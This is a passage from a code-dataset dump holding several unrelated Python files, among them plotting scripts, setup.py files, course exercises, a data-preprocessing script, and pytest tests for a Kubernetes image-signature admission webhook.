in np.log(data[k])]\n log_k = [np.log(k) for k in k_range for point in np.log(data[k])]\n\n log_error = [np.std(data[k], ddof=1) / np.mean(data[k]) for k in k_range]\n # print(log_error)\n\n popt, pcov = curve_fit(linear_model, log_k, log_data)\n print('log {} = ({:3f} +- {:3f}) log k + {:3f} +- {:3f}'.format(phase, popt[0], pcov[0][0], popt[1], pcov[1][1]))\n\n plt.figure(figsize=(4, 3))\n # plt.scatter(log_k + np.random.normal(0, 0.01, len(log_k)), log_data, alpha=0.1)\n plt.plot(log_range, linear_model(log_range, *popt), 'r')\n plt.errorbar(log_range, log_means, yerr=log_error, fmt='b.', capsize=3)\n # plt.title('{0} Phase Length ({1}x{1} grid, {2} neighborhood)'.format(phase, size,\n # 'Von Neuman' if neighborhood == 'vn' else 'Moore'))\n plt.xlabel('log k')\n plt.ylabel('log {} Phase Length'.format(phase))\n os.makedirs(cca_dir + 'plots/phase_lengths/', exist_ok=True)\n plt.savefig(cca_dir + 'plots/phase_lengths/{}_{}_{}.pdf'.format(size, neighborhood, phase.lower()),\n bbox_inches='tight')\n\n try:\n plt.show()\n except KeyboardInterrupt:\n exit()\n\n\ndef plot_grid_sizes(phase, data_128, data_256, data_512, neighborhood):\n if neighborhood == 'moore':\n k_range = moore_range\n log_range = np.log(moore_range)\n elif neighborhood == 'vn':\n k_range = vn_range\n log_range = np.log(vn_range)\n\n colors = ['red', 'green', 'blue']\n\n plt.figure(figsize=(4, 3))\n\n sizes = [128, 256, 512]\n\n for i, data in enumerate([data_128, data_256, data_512]):\n log_data = [np.log(np.mean(data[k])) for k in data]\n log_error = [np.std(data[k], ddof=1) / np.mean(data[k]) for k in data]\n\n popt, pcov = curve_fit(linear_model, log_range, log_data)\n # print(pcov)\n\n plt.plot(log_range + (i-1) / 75, linear_model(log_range, *popt), color=colors[i], 
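The plotting code above estimates power laws: fitting a straight line to (log k, log length) makes the slope the power-law exponent. A self-contained sketch of that estimation step on synthetic data with a known exponent:

import numpy as np
from scipy.optimize import curve_fit

def linear_model(x, m, b):
    return m * x + b

k = np.arange(7, 16)
y = 2.5 * k ** 1.8                     # synthetic data following y = 2.5 * k^1.8
popt, _ = curve_fit(linear_model, np.log(k), np.log(y))
print('estimated exponent: %.3f' % popt[0])   # ~1.800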
label='{0}x{0}'.format(sizes[i]))\n plt.errorbar(log_range + (i-1) / 75, log_data, yerr=log_error, fmt='.', capsize=3, color=colors[i])\n\n plt.xlabel('log k')\n plt.ylabel('log {} Phase Length'.format(phase))\n if phase == 'Defect':\n plt.legend(loc='lower right', fontsize=10, title='Grid size')\n os.makedirs(cca_dir + 'plots/phase_lengths/', exist_ok=True)\n plt.savefig(cca_dir + 'plots/phase_lengths/all_sizes_{}_{}.pdf'.format(neighborhood, phase.lower()),\n bbox_inches='tight')\n\n plt.show()\n\n\ndef single(neighborhood, size):\n # Getting back the objects:\n with open(cca_dir + 'pickles/{}_{}.pkl'.format(size, neighborhood), 'rb') as f:\n debris_lengths, droplet_lengths, defect_lengths = pickle.load(f)\n\n plot('Debris', debris_lengths, neighborhood)\n plot('Droplet', droplet_lengths, neighborhood)\n plot('Defect', defect_lengths, neighborhood)\n\n\ndef compare(neighborhood):\n with open(cca_dir + 'pickles/128_{}.pkl'.format(neighborhood), 'rb') as f:\n debris_128, droplet_128, defect_128 = pickle.load(f)\n\n with open(cca_dir + 'pickles/256_{}.pkl'.format(neighborhood), 'rb') as f:\n debris_256, droplet_256, defect_256 = pickle.load(f)\n\n with open(cca_dir + 'pickles/512_{}.pkl'.format(neighborhood), 'rb') as f:\n debris_512, droplet_512, defect_512 = pickle.load(f)\n\n # print(debris_128)\n\n plot_grid_sizes('Debris', debris_128, debris_256, debris_512, neighborhood)\n plot_grid_sizes('Droplet', droplet_128, droplet_256, droplet_512, neighborhood)\n plot_grid_sizes('Defect', defect_128, defect_256, defect_512, neighborhood)\n\n\nif __name__ == '__main__':\n for neighborhood, size in itertools.product(neighborhoods, sizes):\n print('Plotting {} {}...'.format(neighborhood, size))\n single(neighborhood, size)\n\n for neighborhood in neighborhoods:\n print('Comparing sizes for {}...'.format(neighborhood))\n compare(neighborhood)\n","sub_path":"code/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":4884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"513043825","text":"#! 
/usr/bin/env python\n# -*- coding: utf-8 -*-\n# vim:fenc=utf-8\n#\n# Copyright © 2016 matsumoto \n#\n# Distributed under terms of the MIT license.\n\nimport os\nimport random\n\nimport numpy as np\n\nfrom tqdm import tqdm\n\n\nHOME = os.environ['HOME']\nFEATURE_DIR = HOME + '/mnt/ILSVRC2012/feature_vgg_da/'\n# FEATURE_DIR = HOME + '/mnt/ILSVRC2012/feature/'\nFILE_LIST = HOME + '/mnt/ILSVRC2012/val_list.txt'\n\n\ndef load_imagenet(concept_id, pos_neg, pos_num):\n # neg_num = pos_num\n neg_num = 10000\n data = []\n features = os.listdir(FEATURE_DIR + concept_id)\n if concept_id == 'val':\n for feature in tqdm(random.sample(features, neg_num)):\n image_vec = np.load(FEATURE_DIR + concept_id + '/' + feature)\n # data.append(image_vec[0])\n for image in image_vec:\n data.append(image)\n else:\n i = 0\n for feature in tqdm(features):\n image_vec = np.load(FEATURE_DIR + concept_id + '/' + feature)\n i += 1\n # data.append(image_vec[0])\n for image in image_vec:\n data.append(image)\n np_data = np.array(data, dtype=np.float32)\n size = np_data.shape[0]\n np_target = np.array([pos_neg] * size, dtype=np.float32)\n # np_target = np.array([[pos_neg] * 10] * size, dtype=np.float32)\n # imagenet = {'data': np_data, 'target': np_target}\n if concept_id == 'val':\n return np_data, np_target\n return np_data, np_target, i\n\n\ndef load_imagenet_data(pos_concept_id, neg_concept_id):\n pos_data, pos_target, pos_num = load_imagenet(pos_concept_id, 0, 0)\n neg_data, neg_target = load_imagenet(neg_concept_id, 1, pos_num)\n # imagenet = {'data': np.r_[pos_data, neg_data], 'target': np.r_[pos_target,\n # neg_target]}\n return pos_data, pos_target, neg_data, neg_target\n # return imagenet\n","sub_path":"net_still/data_ori.py","file_name":"data_ori.py","file_ext":"py","file_size_in_byte":1936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"66236626","text":"# Gather input from the user\r\nnumber = int(input(\"Find the square root of integer: \"))\r\nguess = int(input(\"Initial guess: \"))\r\ntolerance = float(input(\"What tolerance: \"))\r\n\r\ncount = 0 # count the number of guesses\r\nprevious = 0 # track the previous calculated value\r\n\r\n# Until we are within tolerance, keep inching our way towards the square root\r\nwhile abs(previous - guess) > tolerance:\r\n previous = guess\r\n quotient = number / guess\r\n guess = (quotient + guess) / 2\r\n count += 1\r\n\r\nprint(\"Square root of\", number, \"is\", round(guess, 4))\r\nprint(\"Took\", count, \"reps to get it to tolerance\")","sub_path":"assignments/algorithms/advanced/babylonian_sqrt.py","file_name":"babylonian_sqrt.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"425651385","text":"from setuptools import find_packages, setup\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetup(\n name=\"tf-keras-vis\",\n version=\"0.6.1\",\n author=\"keisen\",\n author_email=\"k.keisen@gmail.com\",\n description=\"Neural network visualization toolkit for tf.keras\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/keisen/tf-keras-vis\",\n packages=find_packages(),\n classifiers=[\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ],\n python_requires='>=3.6, <3.10',\n install_requires=['scipy', 'pillow', 'deprecated', 'imageio', 
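The loop in the square-root script above is the Babylonian (Newton's) method for x**2 = n: each step replaces the guess with the average of the guess and number/guess, roughly doubling the number of correct digits. The same logic as a reusable function (a sketch):

def babylonian_sqrt(number, guess=1.0, tolerance=1e-9):
    # Iterate guess <- (guess + number/guess) / 2 until two successive
    # guesses agree to within the tolerance.
    previous = 0.0
    while abs(previous - guess) > tolerance:
        previous = guess
        guess = (guess + number / guess) / 2
    return guess

assert abs(babylonian_sqrt(2) - 2 ** 0.5) < 1e-6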
'packaging'],\n extras_require={\n 'develop': ['flake8', 'isort', 'yapf', 'pytest', 'pytest-pycodestyle', 'pytest-cov'],\n 'examples': ['jupyterlab==2.*', 'jedi==0.17.*', 'matplotlib'],\n },\n include_package_data=True,\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"341390439","text":"import os\n\nfrom setuptools import setup, Command\n\nversion = \"0.2.0\"\n\ndef readme():\n with open(\"README.md\") as r:\n return r.read()\n\n\nclass VersionCommand(Command):\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n print(version)\n\n\nsetup(\n name='classyconf',\n version=version,\n description='Extensible library for separation of settings from code.',\n long_description=readme(),\n long_description_content_type='text/markdown',\n author=\"Hernan Lozano\", author_email=\"hernantz@gmail.com\",\n license=\"MIT\",\n packages=['classyconf'],\n platforms='any',\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Framework :: Django',\n 'Framework :: Flask',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: Implementation :: PyPy',\n 'Topic :: Software Development :: Libraries',\n ],\n url='http://github.com/hernantz/classyconf',\n project_urls={\n \"Documentation\": \"https://classyconf.readthedocs.io/en/latest/\"\n },\n download_url='https://github.com/hernantz/classyconf/tarball/{}'.format(version),\n cmdclass={'version': VersionCommand},\n test_suite=\"tests\",\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"199894028","text":"\"\"\"\r\nStudent code for Word Wrangler game\r\n\"\"\"\r\n# avoiding use of set, sorted, or sort to focus on ordered lists and recursion\r\n\r\nimport urllib2\r\nimport codeskulptor\r\nimport poc_wrangler_provided as provided\r\n\r\nWORDFILE = \"assets_scrabble_words3.txt\"\r\ncodeskulptor.set_timeout(15)\r\n\r\n# Functions to manipulate ordered word lists\r\n\r\ndef remove_duplicates(list1):\r\n \"\"\"\r\n Eliminate duplicates in a sorted list.\r\n\r\n Returns a new sorted list with the same elements in list1, but\r\n with no duplicates.\r\n\r\n This function can be iterative.\r\n \"\"\"\r\n newlist = [list1[0]]\r\n comparison = list1[0]\r\n for item in list1:\r\n if comparison != item:\r\n newlist.append(item)\r\n comparison = item\r\n return newlist\r\n\r\ndef intersect(list1, list2):\r\n \"\"\"\r\n Compute the intersection of two sorted lists.\r\n\r\n Returns a new sorted list containing only elements that are in\r\n both list1 and list2.\r\n\r\n This function can be iterative.\r\n \"\"\"\r\n intersection = []\r\n for item in list1:\r\n if item in list2:\r\n intersection.append(item)\r\n return intersection\r\n\r\n# Functions to perform merge sort\r\n\r\ndef merge(list1, list2):\r\n \"\"\"\r\n Merge two sorted lists.\r\n\r\n Returns a new sorted list containing those elements that are in\r\n either list1 or list2.\r\n\r\n This function can be iterative.\r\n \"\"\"\r\n merged_list = []\r\n \r\n 
while len(list1) != 0 or len(list2) != 0:\r\n if len(list1) == 0:\r\n merged_list = merged_list + list2\r\n list2 = []\r\n elif len(list2) == 0:\r\n merged_list = merged_list + list1\r\n list1 = []\r\n elif list1[0] <= list2[0]:\r\n merged_list.append(list1[0])\r\n list1.remove(list1[0])\r\n else:\r\n merged_list.append(list2[0])\r\n list2.remove(list2[0])\r\n \r\n return merged_list\r\n\r\ndef merge_sort(list1):\r\n \"\"\"\r\n Sort the elements of list1.\r\n\r\n Return a new sorted list with the same elements as list1.\r\n\r\n This function should be recursive.\r\n \"\"\"\r\n if len(list1) == 1:\r\n return list1\r\n else:\r\n half_length = len(list1)/2\r\n half1 = merge_sort(list1[:half_length])\r\n half2 = merge_sort(list1[half_length:])\r\n return merge(half1, half2)\r\n\r\n# Function to generate all strings for the word wrangler game\r\ndef gen_all_strings(word):\r\n \"\"\"\r\n Generate all strings that can be composed from the letters in word\r\n in any order.\r\n\r\n Returns a list of all strings that can be formed from the letters\r\n in word.\r\n\r\n This function should be recursive.\r\n \"\"\"\r\n\r\n if word == \"\":\r\n return [\"\"]\r\n \r\n else:\r\n first = word[0]\r\n rest = word[1:]\r\n rest_strings = gen_all_strings(rest)\r\n new_words = []\r\n for item in rest_strings:\r\n for letter in range(len(item) + 1):\r\n new_words.append(item[:letter] + first + item[letter:])\r\n return rest_strings + new_words\r\n \r\n\r\n\r\n# Function to load words from a file\r\n\r\ndef load_words(filename):\r\n \"\"\"\r\n Load word list from the file named filename.\r\n\r\n Returns a list of strings.\r\n \"\"\"\r\n word_list = []\r\n words = codeskulptor.file2url(WORDFILE)\r\n netfile = urllib2.urlopen(words)\r\n for line in netfile.readlines():\r\n word_list.append(line[:-1]) \r\n return word_list\r\n\r\ndef run():\r\n \"\"\"\r\n Run game.\r\n \"\"\"\r\n words = load_words(WORDFILE)\r\n wrangler = provided.WordWrangler(words, remove_duplicates, \r\n intersect, merge_sort, \r\n gen_all_strings)\r\n provided.run_game(wrangler)\r\n\r\n# Uncomment when you are ready to try the game\r\nrun()\r\n","sub_path":"WordWrangler.py","file_name":"WordWrangler.py","file_ext":"py","file_size_in_byte":3762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"93455750","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 4 17:29:50 2019\n\n@author: n8891974\n\"\"\"\n\n# Imports\nimport pandas as pd\nimport numpy as np\nimport scipy.stats as stats\n\n# Import plotting libraries\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# Import ML libraries\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.metrics import classification_report, accuracy_score\nfrom sklearn.model_selection import GridSearchCV\nrs = 10 # Set a random state const\n\n\n# Ignore Warnings\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n### Globals ###\n\n\n# Do the data analysis\ndata = pd.read_csv(\"Kick.csv\", \n index_col = 'PurchaseID', \n na_values = ('?', '#VALUE!'))\n\ndef PreProcessing (data):\n print(\"Pre-Processing Step\")\n \n # Check if there are any missing target variables\n if data['IsBadBuy'].isnull().values.any() == True:\n print(\"Missing Target Variables\")\n else:\n print(\"No missing Target Variables\")\n \n \n # Handle Bad Columns drop Columns\n print(\"Drop PRIMEUNIT due to insufficient data amount\")\n print(\"Drop AUCGUART due to insufficient and data amount and leaky 
data\")\n print(\"Drop WheelTypeID due to it being a duplicate of WheelType\")\n print(\"Drop ForSale due to data skew\")\n print(\"Drop PurchaseDate due to it being a duplicate of PurchaseTimeStamp\")\n data.drop(['PRIMEUNIT', 'AUCGUART', 'WheelTypeID', 'ForSale', 'PurchaseDate'], \n axis=1, \n inplace=True)\n \n \n # Handle Missing Values\n i = 0 # Python's indexing starts at zero\n for item in data['TopThreeAmericanName']: # Python's for loops are a \"for each\" loop \n if data['TopThreeAmericanName'][i] == np.nan and data['Make'][i] == 'Hyundai':\n data['TopThreeAmericanName'][i] = 'HYUNDAI'\n i += 1\n \n i = 0 # Python's indexing starts at zero\n for item in data['TopThreeAmericanName']: # Python's for loops are a \"for each\" loop \n if data['TopThreeAmericanName'][i] == np.nan and data['Make'][i] == 'Jeep':\n data['TopThreeAmericanName'][i] = 'JEEP'\n i += 1\n \n \n \"\"\" DOES THIS HAVE TO BE THERE \"\"\"\n # print(data.groupby(['TopThreeAmericanName'])['Make'].value_counts())\n \"\"\" DOES THIS HAVE TO BE THERE \"\"\"\n \n \n \n # Standardise the capitilization across all object rows\n obj_cols = data.select_dtypes(include='object').columns # Create a list of col names\n for i in obj_cols: # Interate over the obj_cols list\n data[i] = data[i].str.upper() # Convert all strings to uppercase\n \n # Standardize USA to AMERICA\n data['Nationality'].replace({'USA' : 'AMERICAN'}, inplace = True)\n \n # Turn Transmission into a binary variable with Auto = 1 and Manual = 0\n data.rename({'Transmission' : 'Auto'}, axis = 1, inplace = True)\n # Replace binary columns with 1s and 0s\n data['Auto'].replace({'MANUAL' : 0, 'AUTO' : 1}, inplace=True)\n \n # Remove NOT AVAIL in color and place it in the NaN section\n data['Color'].replace({'NOT AVAIL': np.nan}, inplace = True)\n \n \n \"\"\" I'll have to check with teach if this is correct\n #This is the significance test for VNST\n # Check to see if VNST is a statisically significant variable\n # Create a distribution of IsBuyBad for VNST\n VNST_badBuy = pd.crosstab(data['IsBadBuy'], data['VNST']).loc[0]\n VNST_goodBuy = pd.crosstab(data['IsBadBuy'], data['VNST']).loc[1]\n categoricalPlot('VNST')\n \n # Use a Chi2 test to test if there is any corrilation between them, if there is\n # (p < 0.05) discarde the variable\n fScore, pValue = stats.f_oneway(VNST_badBuy, VNST_goodBuy)\n print(\"The pValaue is \" + str(pValue) + \" which is significant enough to reject null hypothesis\")\n \"\"\"\n print(\"Drop VNST due to statistical insignificance\")\n data.drop('VNST', axis=1, inplace = True)\n \n \n # Seperate the Size feature into Size and Body\n tempSize = data['Size'].str.split(' ', expand = True) # Create temp var with split column\n data['Size'] = tempSize[0] # Save the temp var back into data\n data['Body'] = tempSize[1] # Save the temp var back into data\n data['Body'].fillna('CITY', inplace = True) # Assume any other cars are 'City'\n data.loc[data.Size == 'VAN', 'Body'] = 'Van' # Convert Van into a body type\n data.loc[data.Size == 'VAN', 'Size'] = np.nan # Take van away from size, shouldn't matter once OH is done\n \n \n # Replace all non 0, 1 values in IsOnlineSale to 1\n maskOnlineSale = data['IsOnlineSale'] != 0 # Any value that isn't 0 will be set to 1\n data.loc[maskOnlineSale, 'IsOnlineSale'] = 1 # Set the values to 1\n \n \n # Converting the TimeStamp into Quater\n Quater = [] # Create empty string\n for i, _ in enumerate(data.PurchaseTimestamp): # Loop over the entire dataset\n # Convert the epoch datetime into the quater and append 
to list\n Quater.append(pd.Timestamp(data.PurchaseTimestamp.loc[i], unit = 's').quarter) \n data['Quater'] = Quater # Create the column with list\n data.drop('PurchaseTimestamp', axis=1, inplace = True) # Drop old TimeStamp\n \n \n \n \"\"\" This will take care of any Null values we don't specifically take care of\n by replaceing the missing data with data from the same distibution\"\"\"\n for i in data.columns: # Loop over dataset\n if data[i].isna().any(): # Check to see if there is a NaN is the feature\n dist = data[i].value_counts(normalize=True) # Find the distrabution of the column\n missing = data[i].isna() # Find where the NaN are\n # Replace the NaNs with values from the same distrabution of the column\n data.loc[missing, i] = np.random.choice(dist.index, size=len(data[missing]),p=dist.values) \n print(\"Converted all of \" + i + \"s missing values into the same distrubution\")\n \n \n \"\"\" This should be the last thing done \"\"\"\n # Convert all categorical variables into one hot representations\n \n print(\"The number of features before one hot encoding is \" + str(data.shape[1]))\n data_OH = pd.get_dummies(data, columns = ['Auction', 'Make', 'Color', 'VehYear', \n 'Nationality', 'Size', 'Body', 'TopThreeAmericanName', \n 'WheelType', 'Quater'])\n print(\"The number of features after one hot encoding is \" + str(data_OH.shape[1]))\n \n \n return data, data_OH\n\n\n# Define a function to plot catgorical variables with relation to another cat, default is IsBadBuy\ndef categoricalPlot(cat, cat2 = 'IsBadBuy'): # Cat is the carigorical as a string i.e 'Size'\n pd.crosstab(data[cat],data[cat2]).plot(kind=\"bar\")\n\n\ndef Question1(data):\n print(\"Question 1.\")\n \n # check to see if the are any odd labaels\n \n counts = data[\"IsBadBuy\"].value_counts()\n total = data[\"IsBadBuy\"].count()\n \n # calculate the percentage\n # kick is where IsBadBuy == 1\n kickPersentage = counts[1] / total * 100\n print (\"Questin 1.1 :\")\n print( kickPersentage, \"%\")\n \n\n### RUN THE OUTPUT ###\ndata, data_OH = PreProcessing(data)\nQuestion1(data)","sub_path":"Assignment_1/DMProj1.py","file_name":"DMProj1.py","file_ext":"py","file_size_in_byte":7280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"549430778","text":"import os\nimport pytest\nfrom flask import Flask\nimport json\nfrom connaisseur.image import Image\nfrom connaisseur.exceptions import NotFoundException\nimport connaisseur.flask_server as fs\nimport connaisseur.policy as policy\nimport connaisseur.kube_api as api\nimport connaisseur.mutate as mutate\nfrom requests.exceptions import HTTPError\n\n\n@pytest.fixture\ndef mock_kube_request(monkeypatch):\n def m_request(path: str):\n name = path.split(\"/\")[-1]\n try:\n return get_file_json(f\"tests/data/{name}.json\")\n except FileNotFoundError:\n raise HTTPError\n\n monkeypatch.setattr(api, \"request_kube_api\", m_request)\n\n\n@pytest.fixture\ndef mock_notary_health(monkeypatch):\n def m_health_check(path: str):\n if path == \"healthy\":\n return True\n return False\n\n monkeypatch.setattr(fs, \"health_check\", m_health_check)\n\n\n@pytest.fixture\ndef mock_policy_no_verify(monkeypatch):\n def m__init__(self):\n self.policy = {\"rules\": [{\"pattern\": \"*:*\", \"verify\": False}]}\n\n monkeypatch.setattr(policy.ImagePolicy, \"__init__\", m__init__)\n\n\n@pytest.fixture\ndef mock_policy_verify(monkeypatch):\n def m__init__(self):\n self.policy = {\"rules\": [{\"pattern\": \"*:*\", \"verify\": True}]}\n\n 
monkeypatch.setattr(policy.ImagePolicy, \"__init__\", m__init__)\n\n\n@pytest.fixture\ndef mock_notary_allow_leet(monkeypatch):\n def m_get_trusted_digest(host: str, image: Image, policy_rule: dict):\n if (\n image.digest\n == \"1337133713371337133713371337133713371337133713371337133713371337\"\n ):\n return \"abcdefghijklmnopqrst\"\n else:\n raise NotFoundException(\n 'could not find signed digest for image \"{}\" in trust data.'.format(\n str(image)\n )\n )\n\n monkeypatch.setattr(mutate, \"get_trusted_digest\", m_get_trusted_digest)\n\n\n@pytest.fixture\ndef mock_mutate(monkeypatch):\n def m_get_parent_images(request: dict, index: int, namespace: str):\n return []\n\n monkeypatch.setattr(mutate, \"get_parent_images\", m_get_parent_images)\n\n\ndef get_file_json(path: str):\n with open(path, \"r\") as file:\n return json.load(file)\n\n\ndef test_healthz():\n assert fs.healthz() == (\"\", 200)\n\n\n@pytest.mark.parametrize(\n \"sentinel_name, webhook, notary_health, status\",\n [\n (\"sample_sentinel_run\", \"\", \"healthy\", 200),\n (\"sample_sentinel_fin\", \"\", \"healthy\", 500),\n (\"sample_sentinel_err\", \"\", \"healthy\", 500),\n (\"\", \"\", \"\", 500),\n (\"sample_sentinel_fin\", \"sample_webhook\", \"healthy\", 200),\n (\"sample_sentinel_fin\", \"\", \"healthy\", 500),\n (\"sample_sentinel_fin\", \"sample_webhook\", \"unhealthy\", 500),\n ],\n)\ndef test_readyz(\n mock_kube_request,\n mock_notary_health,\n monkeypatch,\n sentinel_name,\n webhook,\n notary_health,\n status,\n):\n monkeypatch.setenv(\"CONNAISSEUR_NAMESPACE\", \"conny\")\n monkeypatch.setenv(\"CONNAISSEUR_SENTINEL\", sentinel_name)\n monkeypatch.setenv(\"CONNAISSEUR_WEBHOOK\", webhook)\n monkeypatch.setenv(\"NOTARY_SERVER\", notary_health)\n\n assert fs.readyz() == (\"\", status)\n\n\n@pytest.mark.parametrize(\n \"name\",\n [(\"ad_request_deployments\"), (\"ad_request_pods\"), (\"ad_request_replicasets\")],\n)\ndef test_mutate_no_verify(mock_mutate, mock_policy_no_verify, name):\n client = fs.APP.test_client()\n\n mock_request_data = get_file_json(f\"tests/data/{name}.json\")\n response = client.post(\"/mutate\", json=mock_request_data)\n assert response.status_code == 200\n assert response.is_json\n admission_response = response.get_json()[\"response\"]\n assert admission_response[\"allowed\"] == True\n assert admission_response[\"status\"][\"code\"] == 202\n assert not \"response\" in admission_response[\"status\"]\n\n\n@pytest.mark.parametrize(\n \"name, api_version, allowed, code, message\",\n [\n (\"ad_request_pods\", \"v2\", False, 403, \"API version v2 unknown.\"),\n (\n \"sample_releases\",\n \"admission.k8s.io/v1beta1\",\n False,\n 403,\n \"unknown request object kind None\",\n ),\n ],\n)\ndef test_mutate_invalid(monkeypatch, name, api_version, allowed, code, message):\n monkeypatch.setenv(\"DETECTION_MODE\", \"0\")\n client = fs.APP.test_client()\n\n mock_request_data = get_file_json(f\"tests/data/{name}.json\")\n mock_request_data[\"apiVersion\"] = api_version\n response = client.post(\"/mutate\", json=mock_request_data)\n assert response.status_code == 200\n assert response.is_json\n admission_response = response.get_json()[\"response\"]\n assert admission_response[\"allowed\"] == allowed\n assert admission_response[\"status\"][\"code\"] == code\n assert admission_response[\"status\"][\"message\"] == message\n\n\n@pytest.mark.parametrize(\n \"name, allowed, image, detection\",\n [\n (\n \"ad_request_pods\",\n False,\n 
\"someguy/charlie-image@sha256:91ac9b26df583762234c1cdb2fc930364754ccc59bc752a2bfe298d2ea68f9ff\",\n \"0\",\n ),\n (\n \"ad_request_pods\",\n False,\n \"docker.io/someguy/charlie-image@sha256:91ac9b26df583762234c1cdb2fc930364754ccc59bc752a2bfe298d2ea68f9ff\",\n \"0\",\n ),\n (\n \"ad_request_pods\",\n False,\n \"docker.io/alice/goes-to-town-image@sha256:deadbeafdeadbeafdeadbeafdeadbeafdeadbeafdeadbeafdeadbeafdeadbeaf\",\n \"1\",\n ),\n (\n \"ad_request_pods\",\n True,\n \"someguy/bob-image@sha256:1337133713371337133713371337133713371337133713371337133713371337\",\n \"0\",\n ),\n (\n \"ad_request_pods\",\n True,\n \"docker.io/theotherguy/benign@sha256:1337133713371337133713371337133713371337133713371337133713371337\",\n \"1\",\n ),\n ],\n)\ndef test_mutate_verify(\n mock_mutate,\n mock_policy_verify,\n mock_notary_allow_leet,\n name,\n allowed,\n image,\n detection,\n monkeypatch,\n):\n monkeypatch.setenv(\"DETECTION_MODE\", detection)\n client = fs.APP.test_client()\n\n mock_request_data = get_file_json(f\"tests/data/{name}.json\")\n mock_request_data[\"request\"][\"object\"][\"spec\"][\"containers\"][0][\"image\"] = image\n response = client.post(\"/mutate\", json=mock_request_data)\n assert response.status_code == 200\n assert response.is_json\n\n admission_response = response.get_json()[\"response\"]\n\n assert admission_response[\"allowed\"] == allowed\n\n if allowed:\n assert admission_response[\"status\"][\"code\"] == 202\n assert not \"message\" in admission_response[\"status\"]\n else:\n assert admission_response[\"status\"][\"code\"] == 403\n image = (\n image\n if image.startswith(\"docker.io/\")\n else \"{}{}\".format(\"docker.io/\", image)\n )\n detection_mode_string = (\n \" (not denied due to DETECTION_MODE)\" if detection == \"1\" else \"\"\n )\n expected_message = (\n 'could not find signed digest for image \"{}\" in trust data.{}'.format(\n image, detection_mode_string\n )\n )\n assert admission_response[\"status\"][\"message\"] == expected_message\n","sub_path":"connaisseur/tests/test_flask_server.py","file_name":"test_flask_server.py","file_ext":"py","file_size_in_byte":7230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"569986840","text":"# -*- coding: cp1251 -*- #\nfrom base import BasePage\n\nfrom systems.KURSSKLAD.REPORTS.SUBTYPESALE.templates.index import index\n\nclass SubTypeSale(BasePage):\n \n def index(self, id_system=None):\n BasePage.index(self, id_system)\n subtype = self.dbExec(sql='select *\\\n from docsubtype dst\\\n left join doctype dt on dst.doctid = dt.doctid\\\n where dt.code = ?',\n params=['SALE'], fetch='all')['datalist']\n return self.drawTemplate(templ=index, data=[{'subtype':subtype}])\n index.exposed = True \n \n def byWares(self,dbeg,dend,subtype):\n if subtype == 'null': subtype = None\n data = self.dbExec(sql='select * from K_SUBTYPESALE_SEL(?,?,?) 
order by wname',\n params=[dbeg,dend,subtype], fetch='all')\n return self.pyDumps(data)\n byWares.exposed = True\n \n def byWaresDocs(self,dbeg,dend,subtype,waresid):\n if subtype == 'null': subtype = None\n data = self.dbExec(sql='select * from K_SUBTYPESALE_DOCS(?,?,?,?)',\n params=[dbeg,dend,subtype,waresid], fetch='all')\n return self.pyDumps(data)\n byWaresDocs.exposed = True\n \n \n def byDocuments(self,dbeg,dend,subtype):\n if subtype == 'null': subtype = None\n data = self.dbExec(sql='select * from WH_REPORT_SUBTYPESALE_DOCUMENTS(?,?,?)',\n params=[subtype,dbeg,dend], fetch='all')\n return self.pyDumps(data)\n byDocuments.exposed = True ","sub_path":"systems/KURSSKLAD/REPORTS/SUBTYPESALE/subtypesale.py","file_name":"subtypesale.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"153138191","text":"\nclass Foo(object):\n def doSomething(self,x):\n print(\"do something: (%s,%s)\"%(self,x))\n\n @classmethod\n def class_foo(cls,x):\n # for classMethod, first function argument has to be Class reference\n b = cls()\n b.doSomething('b')\n print(\"executing class_method(%s,%s)\"%(cls,x))\n\n @staticmethod\n def static_foo(x):\n print(\"executing static_method(%s)\"%x)\n\na=Foo()\n\na.class_foo(1)\nFoo.class_foo(1)\n\na.static_foo(1)\nFoo.static_foo('hi')\n","sub_path":"suger/class_vs_static.py","file_name":"class_vs_static.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"29"} +{"seq_id":"48800273","text":"# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0\n# For details: https://github.com/gaogaotiantian/viztracer/blob/master/NOTICE.txt\n\nfrom viztracer import VizTracer\nimport time\nimport threading\nfrom .base_tmpl import BaseTmpl\nfrom .cmdline_tmpl import CmdlineTmpl\n\n\ndef fib(n):\n 